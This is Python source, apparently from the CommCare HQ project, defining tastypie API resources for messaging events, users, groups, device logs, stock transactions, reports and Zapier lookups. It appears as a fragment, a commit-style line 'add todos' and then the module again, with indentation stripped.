if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):
return self._get_messages_for_sms(event)
if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
return self._get_messages_for_survey(event)
return [] # see corehq.apps.reports.standard.sms.MessageEventDetailReport.rows
def _get_messages_for_email(self, event):
try:
email = Email.objects.get(messaging_subevent=event.pk)
content = email.body
recipient_address = email.recipient_address
except Email.DoesNotExist:
content = '-'
recipient_address = '-'
return [{
"date": event.date,
"type": "email",
"direction": "outgoing",
"content": content,
"status": MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown'),
"backend": "email",
"contact": recipient_address
}]
def _get_messages_for_sms(self, event):
messages = SMS.objects.filter(messaging_subevent_id=event.pk)
return self._get_message_dicts_for_sms(event, messages, "sms")
def _get_messages_for_survey(self, event):
if not event.xforms_session_id:
return []
xforms_session = event.xforms_session
if not xforms_session:
return []
messages = SMS.objects.filter(xforms_session_couch_id=xforms_session.couch_id)
type_ = "ivr" if event.content_type == MessagingEvent.CONTENT_IVR_SURVEY else "sms"
return self._get_message_dicts_for_sms(event, messages, type_)
def _get_message_dicts_for_sms(self, event, messages, type_):
message_dicts = []
for sms in messages:
if event.status != MessagingEvent.STATUS_ERROR:
status, _ = get_sms_status_display_raw(sms)
else:
status = MessagingEvent.STATUS_SLUGS.get(event.status, "unknown")
message_dicts.append({
"date": sms.date,
"type": type_,
"direction": SMS.DIRECTION_SLUGS.get(sms.direction, "unknown"),
"content": sms.text,
"status": status,
"backend": get_backend_name(sms.backend_id) or sms.backend_id,
"contact": sms.phone_number
})
return message_dicts
def build_filters(self, filters=None, **kwargs):
# Custom filtering for date etc
# see corehq.apps.reports.standard.sms.MessagingEventsReport.get_filters
return super(MessagingEventResourceNew, self).build_filters(filters, **kwargs)
class Meta(object):
queryset = MessagingSubEvent.objects.all()
include_resource_uri = False
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'messaging-event'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization('parent__domain')
paginator_class = NoCountingPaginator
excludes = {
"error_code",
"additional_error_text",
"app_id",
"form_name",
"form_unique_id",
"recipient_id",
"recipient_type",
}
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
# "source": ('exact',), # TODO
"content_type": ('exact',),
"status": ('exact',),
"error_code": ('exact',),
"case_id": ('exact',),
# "contact": ('exact',), # TODO
# "parent": ('exact',), # TODO
}
ordering = [
'date',
]
class MessagingEventResource(HqBaseResource, ModelResource):
content_type_display = fields.CharField(attribute='get_content_type_display')
recipient_type_display = fields.CharField(attribute='get_recipient_type_display')
status_display = fields.CharField(attribute='get_status_display')
source_display = fields.CharField(attribute='get_source_display')
class Meta(object):
queryset = MessagingEvent.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'messaging-event-old'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"source": ('exact',),
"content_type": ('exact',),
"status": ('exact',),
}
ordering = [
'date',
]
add todos
from collections import namedtuple
from itertools import chain
from django.conf.urls import url
from django.contrib.auth.models import User
from django.forms import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import ugettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from casexml.apps.stock.models import StockTransaction
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.sms.models import MessagingEvent, MessagingSubEvent, Email, SMS
from phonelog.models import DeviceReportEntry
from corehq import privileges
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
LoginAuthentication)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.forms import clean_password
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.export.transforms import case_or_user_id_to_name
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.reports.standard.message_event_display import get_event_display_api, get_sms_status_display_raw
from corehq.apps.sms.util import strip_plus, get_backend_name
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.models import (
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
SQLUserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound, get_document_or_not_found
from corehq.util.model_log import ModelAction, log_model_change
from corehq.util.timer import TimingContext
from . import (
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
CorsResourceMixin)
from .pagination import DoesNothingPaginator, NoCountingPaginator
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
query = (UserES()
.domain(domain)
.fields(fields)
.size(size)
.start(start_at))
if q is not None:
query.set_query({"query_string": {"query": q}})
return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
# check for roles associated with the domain
domain_roles = SQLUserRole.objects.by_domain_and_name(kwargs['domain'], bundle.data.get('role'))
if domain_roles:
qualified_role_id = domain_roles[0].get_qualified_id() # roles may not be unique by name
bundle.obj.set_role(kwargs['domain'], qualified_role_id)
else:
raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A read-only user data resource based on elasticsearch.
Supported Params: limit offset q fields
"""
type = "bulk-user"
id = fields.CharField(attribute='id', readonly=True, unique=True)
email = fields.CharField(attribute='email')
username = fields.CharField(attribute='username', unique=True)
first_name = fields.CharField(attribute='first_name', null=True)
last_name = fields.CharField(attribute='last_name', null=True)
phone_numbers = fields.ListField(attribute='phone_numbers', null=True)
@staticmethod
def to_obj(user):
'''
Takes a flat dict and returns an object
'''
if '_id' in user:
user['id'] = user.pop('_id')
return namedtuple('user', list(user))(**user)
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
object_class = object
resource_name = 'bulk-user'
def dehydrate(self, bundle):
fields = bundle.request.GET.getlist('fields')
data = {}
if not fields:
return bundle
for field in fields:
data[field] = bundle.data[field]
bundle.data = data
return bundle
def obj_get_list(self, bundle, **kwargs):
request_fields = bundle.request.GET.getlist('fields')
for field in request_fields:
if field not in self.fields:
raise BadRequest('{0} is not a valid field'.format(field))
params = bundle.request.GET
param = lambda p: params.get(p, None)
fields = list(self.fields)
fields.remove('id')
fields.append('_id')
fn = MOCK_BULK_USER_ES or user_es_call
users = fn(
domain=kwargs['domain'],
q=param('q'),
fields=fields,
size=param('limit'),
start_at=param('offset'),
)
return list(map(self.to_obj, users))
def detail_uri_kwargs(self, bundle_or_obj):
return {
'pk': get_obj(bundle_or_obj).id
}
class CommCareUserResource(v0_1.CommCareUserResource):
class Meta(v0_1.CommCareUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=obj.domain,
api_name=self._meta.api_name,
pk=obj._id))
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if getattr(bundle.obj, key, None) != value:
if key == 'phone_numbers':
bundle.obj.phone_numbers = []
for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
bundle.obj.add_phone_number(strip_plus(phone_number))
if idx == 0:
bundle.obj.set_default_phone_number(strip_plus(phone_number))
should_save = True
elif key == 'groups':
bundle.obj.set_groups(bundle.data.get("groups", []))
should_save = True
elif key in ['email', 'username']:
setattr(bundle.obj, key, value.lower())
should_save = True
elif key == 'password':
domain = Domain.get_by_name(bundle.obj.domain)
if domain.strong_mobile_passwords:
try:
clean_password(bundle.data.get("password"))
except ValidationError as e:
if not hasattr(bundle.obj, 'errors'):
bundle.obj.errors = []
bundle.obj.errors.append(str(e))
return False
bundle.obj.set_password(bundle.data.get("password"))
should_save = True
elif key == 'user_data':
try:
bundle.obj.update_metadata(value)
except ValueError as e:
raise BadRequest(str(e))
else:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def obj_create(self, bundle, **kwargs):
try:
bundle.obj = CommCareUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
)
del bundle.data['password']
self._update(bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
action=ModelAction.DELETE)
raise
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = CommCareUser.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
else:
raise BadRequest(''.join(chain.from_iterable(bundle.obj.errors)))
def obj_delete(self, bundle, **kwargs):
user = CommCareUser.get(kwargs['pk'])
if user:
user.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
return ImmediateHttpResponse(response=http.HttpAccepted())
class WebUserResource(v0_1.WebUserResource):
class Meta(v0_1.WebUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if isinstance(bundle_or_obj, Bundle):
domain = bundle_or_obj.request.domain
obj = bundle_or_obj.obj
elif bundle_or_obj is None:
return None
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=domain,
api_name=self._meta.api_name,
pk=obj._id))
def _validate(self, bundle):
if bundle.data.get('is_admin', False):
# default value Admin since that will be assigned later anyway since is_admin is True
if bundle.data.get('role', 'Admin') != 'Admin':
raise BadRequest("An admin can have only one role : Admin")
else:
if not bundle.data.get('role', None):
raise BadRequest("Please assign role for non admin user")
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == "role":
# role handled in _set_role_for_bundle
continue
if getattr(bundle.obj, key, None) != value:
if key == 'phone_numbers':
bundle.obj.phone_numbers = []
for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
bundle.obj.add_phone_number(strip_plus(phone_number))
if idx == 0:
bundle.obj.set_default_phone_number(strip_plus(phone_number))
should_save = True
elif key in ['email', 'username']:
setattr(bundle.obj, key, value.lower())
should_save = True
else:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def obj_create(self, bundle, **kwargs):
self._validate(bundle)
try:
self._meta.domain = kwargs['domain']
bundle.obj = WebUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
is_admin=bundle.data.get('is_admin', False)
)
del bundle.data['password']
self._update(bundle)
# is_admin takes priority over role
if not bundle.obj.is_admin and bundle.data.get('role'):
_set_role_for_bundle(kwargs, bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.delete(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
else:
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
action=ModelAction.DELETE)
raise
return bundle
def obj_update(self, bundle, **kwargs):
self._validate(bundle)
bundle.obj = WebUser.get(kwargs['pk'])
assert kwargs['domain'] in bundle.obj.domains
if self._update(bundle):
assert kwargs['domain'] in bundle.obj.domains
bundle.obj.save()
return bundle
class AdminWebUserResource(v0_1.UserResource):
domains = fields.ListField(attribute='domains')
def obj_get(self, bundle, **kwargs):
return WebUser.get(kwargs['pk'])
def obj_get_list(self, bundle, **kwargs):
if 'username' in bundle.request.GET:
return [WebUser.get_by_username(bundle.request.GET['username'])]
return [WebUser.wrap(u) for u in UserES().web_users().run().hits]
class Meta(WebUserResource.Meta):
authentication = AdminAuthentication()
detail_allowed_methods = ['get']
list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
class Meta(v0_4.GroupResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post', 'patch']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict):
if 'error_message' in data.data:
data = {'error_message': data.data['error_message']}
elif request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def patch_list(self, request=None, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
(BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
"""
request = convert_post_to_patch(request)
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
collection_name = self._meta.collection_name
if collection_name not in deserialized:
raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
bundles_seen = []
status = http.HttpAccepted
for data in deserialized[collection_name]:
data = self.alter_deserialized_detail_data(request, data)
bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
try:
self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
except AssertionError as e:
status = http.HttpBadRequest
bundle.data['_id'] = str(e)
bundles_seen.append(bundle)
to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
return self.create_response(request, to_be_serialized, response_class=status)
def post_list(self, request, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
(BSD licensed) and modified to catch Exception and not returning traceback
"""
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
deserialized = self.alter_deserialized_detail_data(request, deserialized)
bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
try:
updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
location = self.get_resource_uri(updated_bundle)
if not self._meta.always_return_data:
return http.HttpCreated(location=location)
else:
updated_bundle = self.full_dehydrate(updated_bundle)
updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
except AssertionError as e:
bundle.data['error_message'] = str(e)
return self.create_response(request, bundle, response_class=http.HttpBadRequest)
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == 'name' and getattr(bundle.obj, key, None) != value:
if not Group.by_name(bundle.obj.domain, value):
setattr(bundle.obj, key, value or '')
should_save = True
else:
raise Exception("A group with this name already exists")
if key == 'users' and getattr(bundle.obj, key, None) != value:
users_to_add = set(value) - set(bundle.obj.users)
users_to_remove = set(bundle.obj.users) - set(value)
for user in users_to_add:
bundle.obj.add_user(user)
should_save = True
for user in users_to_remove:
bundle.obj.remove_user(user)
should_save = True
elif getattr(bundle.obj, key, None) != value:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return self._get_resource_uri(obj)
def _get_resource_uri(self, obj):
# This function is called up to 1000 times per request
# so build url from a known string template
# to avoid calling the expensive `reverse` function each time
return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)
@memoized_property
def _get_resource_uri_template(self):
"""Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
return reverse('api_dispatch_detail', kwargs=dict(
resource_name=self._meta.resource_name,
api_name=self._meta.api_name,
domain='__domain__',
pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')
def obj_create(self, bundle, request=None, **kwargs):
if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
bundle.obj = Group(bundle.data)
bundle.obj.name = bundle.obj.name or ''
bundle.obj.domain = kwargs['domain']
bundle.obj.save()
for user in bundle.obj.users:
CommCareUser.get(user).set_groups([bundle.obj._id])
else:
raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = Group.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
def obj_delete(self, bundle, **kwargs):
group = self.obj_get(bundle, **kwargs)
group.soft_delete()
return bundle
class DomainAuthorization(ReadOnlyAuthorization):
def __init__(self, domain_key='domain', *args, **kwargs):
self.domain_key = domain_key
def read_list(self, object_list, bundle):
return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = DeviceReportEntry.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'device-log'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"user_id": ('exact',),
"username": ('exact',),
"type": ('exact',),
"xform_id": ('exact',),
"device_id": ('exact',),
}
class StockTransactionResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = StockTransaction.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'stock_transaction'
authentication = RequirePermissionAuthentication(Permissions.view_reports)
paginator_class = NoCountingPaginator
authorization = DomainAuthorization(domain_key='report__domain')
filtering = {
"case_id": ('exact',),
"section_id": ('exact'),
}
fields = ['case_id', 'product_id', 'type', 'section_id', 'quantity', 'stock_on_hand']
include_resource_uri = False
def build_filters(self, filters=None):
orm_filters = super(StockTransactionResource, self).build_filters(filters)
if 'start_date' in filters:
orm_filters['report__date__gte'] = filters['start_date']
if 'end_date' in filters:
orm_filters['report__date__lte'] = filters['end_date']
return orm_filters
def dehydrate(self, bundle):
bundle.data['product_name'] = bundle.obj.sql_product.name
bundle.data['transaction_date'] = bundle.obj.report.date
return bundle
ConfigurableReportData = namedtuple("ConfigurableReportData", [
"data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A resource that replicates the behavior of the ajax part of the
ConfigurableReportView view.
"""
data = fields.ListField(attribute="data", readonly=True)
columns = fields.ListField(attribute="columns", readonly=True)
total_records = fields.IntegerField(attribute="total_records", readonly=True)
next_page = fields.CharField(attribute="next_page", readonly=True)
LIMIT_DEFAULT = 50
LIMIT_MAX = 50
def _get_start_param(self, bundle):
try:
start = int(bundle.request.GET.get('offset', 0))
if start < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("start must be a positive integer.")
return start
def _get_limit_param(self, bundle):
try:
limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
if limit < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("limit must be a positive integer.")
if limit > self.LIMIT_MAX:
raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
return limit
def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
if total_records > start + limit:
start += limit
new_get_params = get_query_dict.copy()
new_get_params["offset"] = start
# limit has not changed, but it may not have been present in get params before.
new_get_params["limit"] = limit
return reverse('api_dispatch_detail', kwargs=dict(
api_name=self._meta.api_name,
resource_name=self._meta.resource_name,
domain=domain,
pk=id_,
)) + "?" + new_get_params.urlencode()
else:
return ""
def _get_report_data(self, report_config, domain, start, limit, get_params):
report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
string_type_params = [
filter.name
for filter in report_config.ui_filters
if getattr(filter, 'datatype', 'string') == "string"
]
filter_values = get_filter_values(
report_config.ui_filters,
query_dict_to_dict(get_params, domain, string_type_params)
)
report.set_filter_values(filter_values)
page = list(report.get_data(start=start, limit=limit))
columns = []
for column in report.columns:
simple_column = {
"header": column.header,
"slug": column.slug,
}
if isinstance(column, UCRExpandDatabaseSubcolumn):
simple_column['expand_column_value'] = column.expand_value
columns.append(simple_column)
total_records = report.get_total_records()
return page, columns, total_records
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
start = self._get_start_param(bundle)
limit = self._get_limit_param(bundle)
report_config = self._get_report_configuration(pk, domain)
page, columns, total_records = self._get_report_data(
report_config, domain, start, limit, bundle.request.GET)
return ConfigurableReportData(
data=page,
columns=columns,
total_records=total_records,
id=report_config._id,
domain=domain,
get_params=bundle.request.GET,
next_page=self._get_next_page(
domain,
report_config._id,
start,
limit,
total_records,
bundle.request.GET,
)
)
def _get_report_configuration(self, id_, domain):
"""
Fetch the required ReportConfiguration object
:param id_: The id of the ReportConfiguration
:param domain: The domain of the ReportConfiguration
:return: A ReportConfiguration
"""
try:
if report_config_id_is_static(id_):
return StaticReportConfiguration.by_id(id_, domain=domain)
else:
return get_document_or_not_found(ReportConfiguration, domain, id_)
except DocumentNotFound:
raise NotFound
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj).id,
}
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
if bundle_or_obj is not None and uri:
get_params = get_obj(bundle_or_obj).get_params.copy()
if "offset" not in get_params:
get_params["offset"] = 0
if "limit" not in get_params:
get_params["limit"] = self.LIMIT_DEFAULT
uri += "?{}".format(get_params.urlencode())
return uri
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
list_allowed_methods = []
detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
title = fields.CharField(readonly=True, attribute="title", null=True)
filters = fields.ListField(readonly=True)
columns = fields.ListField(readonly=True)
def dehydrate_filters(self, bundle):
obj_filters = bundle.obj.filters
return [{
"type": f["type"],
"datatype": f["datatype"],
"slug": f["slug"]
} for f in obj_filters]
def dehydrate_columns(self, bundle):
obj_columns = bundle.obj.columns
return [{
"column_id": c['column_id'],
"display": c['display'],
"type": c["type"],
} for c in obj_columns]
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
try:
report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return report_configuration
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
return ReportConfiguration.by_domain(domain)
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
list_allowed_methods = ["get"]
detail_allowed_methods = ["get"]
paginator_class = DoesNothingPaginator
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
domain_name = fields.CharField(attribute='domain_name')
project_name = fields.CharField(attribute='project_name')
class Meta(object):
resource_name = 'user_domains'
authentication = LoginAuthentication(allow_session_auth=True)
object_class = UserDomain
include_resource_uri = False
def dispatch_list(self, request, **kwargs):
try:
return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
except ImmediateHttpResponse as immediate_http_response:
if isinstance(immediate_http_response.response, HttpUnauthorized):
raise ImmediateHttpResponse(
response=HttpUnauthorized(
content='Username or API Key is incorrect', content_type='text/plain'
)
)
else:
raise
def obj_get_list(self, bundle, **kwargs):
return self.get_object_list(bundle.request)
def get_object_list(self, request):
couch_user = CouchUser.from_django_user(request.user)
results = []
for domain in couch_user.get_domains():
if not domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION):
continue
domain_object = Domain.get_by_name(domain)
results.append(UserDomain(
domain_name=domain_object.name,
project_name=domain_object.hr_name or domain_object.name
))
return results
class IdentityResource(CorsResourceMixin, Resource):
id = fields.CharField(attribute='get_id', readonly=True)
username = fields.CharField(attribute='username', readonly=True)
first_name = fields.CharField(attribute='first_name', readonly=True)
last_name = fields.CharField(attribute='last_name', readonly=True)
email = fields.CharField(attribute='email', readonly=True)
def obj_get_list(self, bundle, **kwargs):
return [bundle.request.couch_user]
class Meta(object):
resource_name = 'identity'
authentication = LoginAuthentication()
serializer = ListToSingleObjectSerializer()
detail_allowed_methods = []
list_allowed_methods = ['get']
object_class = CouchUser
include_resource_uri = False
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
"""
Returns: list of forms for a given domain with form name formatted for display in Zapier
"""
form_xmlns = fields.CharField(attribute='form_xmlns')
form_name = fields.CharField(attribute='form_name')
class Meta(object):
resource_name = 'domain_forms'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = Form
include_resource_uri = False
allowed_methods = ['get']
limit = 200
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
application_id = bundle.request.GET.get('application_id')
if not application_id:
raise NotFound('application_id parameter required')
results = []
application = Application.get(docid=application_id)
if not application:
return []
forms_objects = application.get_forms(bare=False)
for form_object in forms_objects:
form = form_object['form']
module = form_object['module']
form_name = '{} > {} > {}'.format(application.name, module.default_name(), form.default_name())
results.append(Form(form_xmlns=form.xmlns, form_name=form_name))
return results
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
"""
Returns: list of case types for a domain
Note: only returns case types for which at least one case has been made
"""
placeholder = fields.CharField(attribute='placeholder')
case_type = fields.CharField(attribute='case_type')
class Meta(object):
resource_name = 'domain_cases'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = CaseType
include_resource_uri = False
allowed_methods = ['get']
limit = 100
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
case_types = get_case_types_for_domain_es(domain)
results = [CaseType(case_type=case_type) for case_type in case_types]
return results
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
"""
Returns: list of usernames for a domain.
"""
user_id = fields.CharField(attribute='user_id')
user_name = fields.CharField(attribute='user_name')
class Meta(object):
resource_name = 'domain_usernames'
authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
object_class = User
include_resource_uri = False
allowed_methods = ['get']
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
user_ids_username_pairs = get_all_user_id_username_pairs_by_domain(domain)
results = [UserInfo(user_id=user_pair[0], user_name=raw_username(user_pair[1]))
for user_pair in user_ids_username_pairs]
return results
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
config_id = None
table_id = None
def dispatch(self, request_type, request, **kwargs):
if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
raise ImmediateHttpResponse(
response=HttpResponseNotFound('Feature flag not enabled.')
)
self.config_id = kwargs['config_id']
self.table_id = int(kwargs.get('table_id', 0))
with TimingContext() as timer:
response = super(BaseODataResource, self).dispatch(
request_type, request, **kwargs
)
record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
